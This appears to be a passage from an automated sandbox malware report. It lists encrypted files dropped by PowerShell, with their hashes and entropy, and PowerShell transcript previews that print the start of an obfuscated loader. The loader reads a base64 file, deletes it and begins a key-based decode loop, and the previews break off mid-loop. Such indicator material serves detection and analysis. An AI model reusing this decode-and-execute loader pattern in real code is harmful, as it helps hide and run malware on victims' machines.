                                                                                            SHA-512:CF0D24DD3781075D8D8C7FF58C7EDFF3AC6B7135B3AEE0D6D2B1A735AE20931AB7911A245D8802D7EE15F00C422B95EA27A77C2B5ACF25BE237FDBDF0B81FADC
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qTrZObDhSCYGyzc.EALtUnXeoquvzOQH
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):61774
                                                                                            Entropy (8bit):7.997185490808133
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:GR2u6/6PIDZac7cxBvJkA78npyyfi7Lh080RDGtL:GQuGyiacoxTdYnQyfyLGdKx
                                                                                            MD5:15C0DF3486B0C799C1CCB39D77FD3F14
                                                                                            SHA1:248E6DE152B7CB36475C2509EFF105F976B070E0
                                                                                            SHA-256:C1EE8054F627D40B4304BD4B5A43CF87715CDB77931D445232BF9BB13439EF6E
                                                                                            SHA-512:A88091E56BC93DBF89D72EFEA8052F2A490F94FAFF014418781F32F7CDEBCA53D8100863338941A3B393229888038FFF99B4E59B40A1DA270A10215EB29FD175
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qptaygGDHOvhK.YSKJRLiycNZuhvbWx
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):131957
                                                                                            Entropy (8bit):7.998586289165588
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:x/539mQWVfhqNDVaBlVId87qvLAXutzFYVaFh5T:xxilhqaHm87YsumaFz
                                                                                            MD5:471DB3ADA6619C5315BF3CB8F6B4B52B
                                                                                            SHA1:43DE47058184912163052BB7529651213C971BB1
                                                                                            SHA-256:CF795AC3005E10176DBE900C398FF1FA51CE9571FE6EDB16BF0D68552923B9C7
                                                                                            SHA-512:0B94395682A269DCE41E6A1A2306670F7FEA494FDC2BC268AAFFDA7D2DE1404C6BC137162D6B0D61B7B0C3183D669EF971CC81813C73819AC27A688FB0C2D5BE
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\qyruEKPUAcSLR.EFYWjJiwvkycQfogCs
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):186512
                                                                                            Entropy (8bit):7.99893112438084
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Nbbefa1yGy81mzkFhvAnmABSINDa5ksLs6Np0XZcdynWEBQA9Uf4gGsuLAN:Nbbv4zkFh4nmABD9cRT02dM925GsuG
                                                                                            MD5:EBCA54C6D1A887021F18E1A04B9961A8
                                                                                            SHA1:C0E90CAA22F28F7F0FAA40478F30EEC6EE55A0E7
                                                                                            SHA-256:3E30401DD208CEE2DBAF9E1AEC8BD5D9E8FF0783FEC0A0F1CDD5DB68DFD7BB06
                                                                                            SHA-512:C500019CEAF9F80FFBDDBDA55815E008B99A446C548ECA617F91C5517090F425F196827C93C87F8306319F6F3CE4A1F1DF599EE3CAB5B943FF34E8D6F93F61DA
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\rwyFtKsoXUNMILDWhJv.OsZECjYcXVLyS
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):161665
                                                                                            Entropy (8bit):7.999061028734399
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:3mCEVnM7ORR/VOCfcOX+yyZFVIJjrgHFCOtGYjstuz79+s+3BPaZfFJBb:3mCqnM7S8CfcOX+/ZjcjrqFrsk79PwhI
                                                                                            MD5:7F6287500EDA5CD0A2FF4C59D3759908
                                                                                            SHA1:98B4978313ED347A970DB00F7DD60368680CB9F6
                                                                                            SHA-256:08848EE839B5E3EAB34780727AB47E70609AE29A28111209FB889E0D9F1C6902
                                                                                            SHA-512:AC68F3932B1770AC81022074A79EA0DC6B77ADE152B4FC0C3E30938ED6AF977BE2DF4CBA93B52EA8C56B033A809E1149641CEAB1A59C97D0323DB887FB31BA97
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\soQwPHCEaWcNnAgRKu.GUhPcAHkzNRoMwdvV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):190459
                                                                                            Entropy (8bit):7.998921520940541
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:atgwlRC0j3bI/ASPa2YY1iFLWoKf+IE3DAbAckwVov5MuF54jfpvUna/quQyZGB7:MgMR/jLI/AbYItWoi+pJckQ+TYjfNUaa
                                                                                            MD5:715726DD32C1CE7E37707C523C99CD24
                                                                                            SHA1:07B9B9C119515CF1BDFA21B0783C2C2CA69583F3
                                                                                            SHA-256:9BC0EC002814F4A3A3385817BDB8DBC6617D27882B3C85B8A7D2771FF4D052F7
                                                                                            SHA-512:B059239701B4F23BD42395D137DBC01B1F1095131C6E42F55500A710D1DBC834821294CC2FD08B48E1D74E770E270487D5F080F4B1349425D770520B083E7A58
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\tQjgMbNFVwAfEpvBK.NrIzOdGfyRFuiWD
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):123900
                                                                                            Entropy (8bit):7.998446148715915
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:Pt+9u1S5y+XugXqi9GtYt0YbgRKQuLygIdxau2UE0zKSal+5:PC2+XHYu0YbRhegqxau2zX5lQ
                                                                                            MD5:5AC304DAF5E06EC6E9DF4684A1D046FB
                                                                                            SHA1:9DA0AFA1A8ABE48F3A6A0DE8F26F2AA40502A0CA
                                                                                            SHA-256:7521E3E5031DDA949E168C2994F02B5B4D969CC251885373DABF8943BF20EB7B
                                                                                            SHA-512:1045887B247005169BEF504F7045762D1E38B539653ACBA9F3D409E3DCC7C0841FF7C4A7301A5A99848FA45F30A866590E2B00D2E79A6F79B13621972B4F4A8F
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\txADckwQGJHK.IxuVkzFSstYXMP
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):70375
                                                                                            Entropy (8bit):7.997466023020883
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:Cai+z0SpVJNjSOYq62H3w7z8SnrsrGgWIiElw8N:Cai+0SpVJNeORH8oSrsrboMN
                                                                                            MD5:C1375E7A0CD1E68D836A90CA8CE0F2F1
                                                                                            SHA1:D8846440178CD8736400B948D94571A1ACFF6957
                                                                                            SHA-256:6416B324A8D46BA5B965DC8215CF7CDC4CF397A1F54F29B3B67450051810B2EB
                                                                                            SHA-512:D0A391F25A9A3D289C37A7A0F511DE6BB512D044CDC7C1D75BF31703C773532CED6009871119D11634D8B998C12F57382C683CF7A5FB0468911A4A31BCF6C62F
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uDCtRUzOGL.UwWJgYkjAFebtZL
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):173218
                                                                                            Entropy (8bit):7.999133593087592
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:AcOI1xlvduqFp/A58KrEU2cyUad7MuDwUUu8xghm5z1K4w/kwp9BGiyy:AxI1jvjCnwU2NUad4awUf8im5JD0kwnn
                                                                                            MD5:B0A5D13782A43D5CCD2E590C585172A2
                                                                                            SHA1:1733E399847BA3BA3019C89F8A65B3200CC01474
                                                                                            SHA-256:395346AC76959347E889B59D0DE641C597B1EA4331550A28A15897E16DC40B2B
                                                                                            SHA-512:569FBAF96577A5B9DA9306CA8894E14B7F63CEA27C2B08F295135A59BABAF9C578BBFB98DA4A7AD305C0CF7C99ECAE63ED4EE78A78456AEC63F400C3911FDC4D
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\uKhTXaEClgGUWFHeSBJ.QqbgwODAcirejphRKoJ
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):52536
                                                                                            Entropy (8bit):7.996154977184581
                                                                                            Encrypted:true
                                                                                            SSDEEP:768:tnt5h3+EgnBytr+be2LDUK5QgMa3jM51DXK/7rpvPJmc2an9meCltGnI2v/u4IuN:5tj3+v0oHDv5RM8mE7rpXJmltcvv/auN
                                                                                            MD5:C206D599CD40B2A56E4FD8A0A97E2C8A
                                                                                            SHA1:07A9F096EA4F80A566F16317BB012004818BBDBE
                                                                                            SHA-256:6BCA876CCD8844CFA673A8A7DD95F72878013B4037242457F507D5BAFF296F9D
                                                                                            SHA-512:D899732DF0B732C46A67D929AC870C87DAB9453B6F879E937D21EE4973D7B22F4C471DBDE14BDC2A3ADB029BF0E3EFE15A7EEBB838F1FE9DE3817FBD0E1C1172
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\wzZdaiABbDLUlNO.hqALkorUdFiNGXQYV
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):168793
                                                                                            Entropy (8bit):7.998937337298736
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:orvkpXsgoh4dJEtlRChLl8PZFVkl86waveacGUicvZucS7L5:EsqgGMEtlRChc48bha9Uicxud
                                                                                            MD5:C960F488DB98FB2B5BC12D70F973484A
                                                                                            SHA1:134C7F8F531147527CDAFEB55528F97459BD3091
                                                                                            SHA-256:6E0C8C6C17CF837662786186F523B5E3CDEED843206AB8BAD797B6EEE8DE8061
                                                                                            SHA-512:FE716BE0135EA1FC325C2743A768EAFA00B812EB3529457D786C1F8694F122A9E93F81A7D318A63FF10D2A2304DAE1CD691D21D37A51ADC62C3083579224A5E7
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xBqjVEPYeTa.VjJmMgSUwYnd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):107007
                                                                                            Entropy (8bit):7.99828242735117
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:NASFqr9ODhqcxS5OeenBbkpKfeWtko5aa0FCJUR+9TUE6n5SG0GT3DW/i:qp9OqcfeeBbqKfekko54QJpOEfa
                                                                                            MD5:4B0D8ADFF65CD853AF300ED0F886CF22
                                                                                            SHA1:6E8B9113158F74B300BFAA1DF9F62C6FF057E085
                                                                                            SHA-256:5337F981D6339252AFDA67C2D818BDE04E84FB1C1795E6A4D60E25B28C7D7DD3
                                                                                            SHA-512:DA24C93C9114510E0D1340578B855B3B731255CB7300A3B082ED6EF79F9F754EA3BC00BF97B5DD906E7282D68212159E295037292847E1691E34F47846348C31
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xnplLXbvwmcNAiIZ.LjIyFXNTqroGmkfAPih
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):151056
                                                                                            Entropy (8bit):7.998841894673308
                                                                                            Encrypted:true
                                                                                            SSDEEP:3072:vvSBaVqoruJ21e0Vd1hKAJTUUmh4WYJmPZ4WlcYBaNC6/K1Uiow4:0a5uJWbLJR2Z4M0iR4
                                                                                            MD5:C76339AD72B940BA8153C473D619F902
                                                                                            SHA1:A5D1B11133AB6B996D9C01B6913B9FBB4AF345DC
                                                                                            SHA-256:85695D16FD26E3DAC3DAAADA81F6837FAEED2C55FF599BDBB37BFFAAC7DD1579
                                                                                            SHA-512:20D4E2FF464BB1BC560C7CCCF03905B6B5B49E7ABE68432C3FD978624618C94E5C52C75F396593BD70460295B13023C92ABDF91ED33303694A5592931229B83C
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\xoqRJdvTuIDia.kZDCejbWsJfd
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):93320
                                                                                            Entropy (8bit):7.997838353464406
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:R9p+DGT8M2poJhFVwdp30m//XFBz6qfIYle7coM6smEs2RB+NTKFUHmdNnwElT59:RD+6T8tpoJ/tm///z67mJKNW2HkGEl19
                                                                                            MD5:718480E96B6D0608ED346AAFAE97C2A3
                                                                                            SHA1:2CF944A4AF013E09E05B6107C8136B7352906432
                                                                                            SHA-256:FA68AF2AD26B39306B1E141C41A11DBDD94B8F56922BE1D7E79FAB52E2EA5617
                                                                                            SHA-512:B7A816F6DA298CD0E4482C7F9112EEEA8B0E056DDE28A144801B2200F10F5F6F6346EBE6AB17BCD57605C0B37C3341E779D446B6F815DB20F5B793EE8F9F1A88
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\yjfLcAxmiM.OWifzdmXlYyKEDMI
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):69884
                                                                                            Entropy (8bit):7.99737951004056
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:JYHVGd7hKk3/y3nxZt1597Vs/S4729cZvxa5TRn/:JsVG5Yj5NVs/SKQWMH/
                                                                                            MD5:FFCF75487ECE00EB24627ECE78C2C582
                                                                                            SHA1:037F4E2D88C9812D67E087AF7AE8EF760A9D646F
                                                                                            SHA-256:0755EF3E8EA3D9DD70E77B07E43061D4FCDED4A9EF2439C3AA4F2D969BC34BB1
                                                                                            SHA-512:C2A2BD904693ADE8A02748DFB8B6ADA6A9CC87C1302281E6EA6A8404D41898CB76055138C316996D0C59BCCB3C973F150DF1F9B1D8218E4DAD9F1AAD40ABBB95
                                                                                            Malicious:true
                                                                                            C:\Users\user\AppData\Roaming\Microsoft\hVCImqdacF\zULyElrBPWfFTGqjKuR.LuHOZEIewPy
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):57272
                                                                                            Entropy (8bit):7.996620349119673
                                                                                            Encrypted:true
                                                                                            SSDEEP:1536:i4kAJApmVYRzl8S6xmwBl5/IBaneypqH2bWyAg1ka:ixAJIppcxdHm83NWy0a
                                                                                            MD5:C5DC0F2C4EF651D99F395DEAFA98EE58
                                                                                            SHA1:B8BE8EB36A64D84C1857890D47E72D99C182F644
                                                                                            SHA-256:86981880F5C59299E4AD2569CE37E3100B17AA286FFEF44A5CEC84B242E1A825
                                                                                            SHA-512:B6825B8392917A0CB844728F1E9FA794FFB8C13E397414D486DC9361E969AAF05C1C313109B332CAAB7A4F4CD3EC1A924F1AFA68CA308FAFD7C583FFF9D053EF
                                                                                            Malicious:true
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595307227915985
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:fqu50ikqu50i+qu50i1h3mqu50iOtPitPUt4qu50iwwppUqu50ir9Ft9FtAFA:CZidZiTZiDZiO6cZiwwpptZif9WA
                                                                                            MD5:61A947E3DD391C88F2CB4F9CA7AC3C8C
                                                                                            SHA1:FDC61AC0EC4D3951867999ABA997714503CB51E5
                                                                                            SHA-256:6C9434DE257A5764E11E8D48D9B30BC53BDBD6A5DEEC9FE3BAD14EF8B2075D76
                                                                                            SHA-512:74EAF9DF26FE1FC7E3513DF65939F13857EEA3BABB4BA03B77DAE1CA326AFA56493F5241CDCE34343FF775211D81393EEC369BDECAA1E53114BF3B18DD8BB43F
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.4ujEuSR7.20211211144038.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.5953985718085715
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Squ50iUSqu50iAqu50iUuh3oqu50iUotPitPUthqu50iUbwpphqu50iUq9Ft9Ftf:/ZiU/ZiRZiUyZiUM6lZiUbwpp4ZiU09p
                                                                                            MD5:265713B5D2360A4D4C2CC042B1448295
                                                                                            SHA1:96882E17B169F42BE4BFB27EBAAA618C08E6F7BA
                                                                                            SHA-256:057D310DB4738E308072903720B71E18D30631CA6487CD336775C2008F26FABA
                                                                                            SHA-512:A64EB7A180F0DA77B9395F14CCC64BDFB9CA6191EC9903CC030AB4C5B58BCC16A55C2D367D5768D5D4C5D1ECF22944A02AB2576B5B9F3554CA1847509E788D72
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.O+ospPLn.20211211144035.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144053..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595472921836246
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:fqu50ijBqu50i+qu50ijeh3Fqu50ijqtPitPUt+qu50ijwwpphqu50ijE9Ft9FtL:CZijYZiTZijnZiji62Zijwwpp4Zijq9V
                                                                                            MD5:E62E6B8AEF6F6C1B6EC084DA5F11657F
                                                                                            SHA1:1529CAA975584C33BA2A6684F214266B87C5FF0A
                                                                                            SHA-256:132FDE640380B51CD0D64F663B36B3EC6D5771D749472A65D31785ED6260BB51
                                                                                            SHA-512:8731FFCC45F421976309B513E72FFCE60F3A4599B7FD3DA785249434301038A006F4A52CA349912463DFA10E39C9B76A1E5DEBBAF178D64389188C6DE5F4A6B2
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.SX01lhy_.20211211144040.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144045..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595518460460629
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Equ50ilqu50ihqu50ikh3Tqu50irtPitPUt7qu50i5wpphqu50i19Ft9FtAFU:9ZiUZi4Zi/ZiJ6TZi5wpp4ZiF9WU
                                                                                            MD5:A9D3FD6B18334DC95D4F564F271E4BF5
                                                                                            SHA1:5AC2477C678A299299B188489BD0CDBD98E1160B
                                                                                            SHA-256:E1D615710020D5AD94711DB277F16055FC357110A172627FCE9B018BE86242FF
                                                                                            SHA-512:D3CA84C9C38969DA0190E40F2975A65B35B053733C5D12EF90E834F656409043A37777B010DCB91F291561192797B8DBDC3499B3C583B22D11537FD8520FE7A9
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.dw4EHDML.20211211144038.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144042..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):3021
                                                                                            Entropy (8bit):5.549796812676628
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:BZPpvhOoO04Q/CZq2qWB3NXGQEXdfkWw1Vdd+UqDYB1Z9I4Q/CZq2qWB3NXGQEXr:BZdhON0XOqjWB5GQEXdfkW2VdAUqDo1Y
                                                                                            MD5:DE4293DC0F6AF346A752D4B326220638
                                                                                            SHA1:7A727C660C7B20594CBFCAEA50F7C927E03108AA
                                                                                            SHA-256:E9BEF26F6A59C818937BC1DA9B70D47BD47D96E09FD58D5B284F8F59B49ECB34
                                                                                            SHA-512:71616C6B5E756D86D1024574B9B51CE3DBE6A9DE73683A90796069B30DF910ABD705BFD14FA3B6557C4B59722CEF17F46384FAD0FCE2F6B442900E4C7F4C92AA
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.q4FgjTZQ.20211211144035.txt, Author: Joe Security
                                                                                            Preview: .**********************..Windows PowerShell transcript start..Start time: 20211211144037..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216041 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $5aea6e979d738e9749c60cd8364510b8='C:\Users\user\cd1d4941a25214b7fba4b955b8549fc9\a62fc76f293ddf9bca4e694e149add5e\38c31bdaa95167e057aa265b20fb62b9\c650a3bf77933bfa9cfee901397d9047\344d381574d3c0f42e9b1b0b1d5e90f0\80045cd6a8338bd6a11b9b7376cfe55a\c27b72a3f30704afeffd331ab1557b93';$25bab4e4c09044d87ed4966010932848='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$9c8a2fc960fe1b6f90b5b7dea2742da4=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($5aea6e979d738e9749c60cd8364510b8));remove-item $5aea6e979d738e9749c60cd8364510b8;for($i=0;$i -lt $9c8a2fc960fe1b6f90b5b7dea2742da4.count;){for($j=0;$j -lt $25bab4e4c09044d87ed4966010932848.length;$j++){$9c8a2f
                                                                                            C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):18114
                                                                                            Entropy (8bit):5.595598859772949
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wqu50irqu50ikqu50i8h34qu50iLtPitPUtbqu50iPwppZqu50iL9Ft9FtAFI:rZiWZidZiAZip6/ZiPwppQZi/9WI
                                                                                            MD5:8BE741D787B92D855A59AF9040336636
                                                                                            SHA1:26ED348E0F16246149D55315FA6A26623566C062
                                                                                            SHA-256:B3C660C6A4636B89F8E007E537757CF2A15888F9F7BFD6043DE7E3A3BAEE6AD0
                                                                                            SHA-512:24DB3AE98B7349D108349F5553A7171DF189276ACC70E2998F71A24B5B3C6B94988579AFF956B0410841CAF8F40F17D920A210475E29DB09A57ECCE7FA54E56A
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_PowershellDedcodeAndExecute, Description: Yara detected Powershell dedcode and execute, Source: C:\Users\user\Documents\20211211\PowerShell_transcript.216041.zcmp3+HP.20211211144037.txt, Author: Joe Security
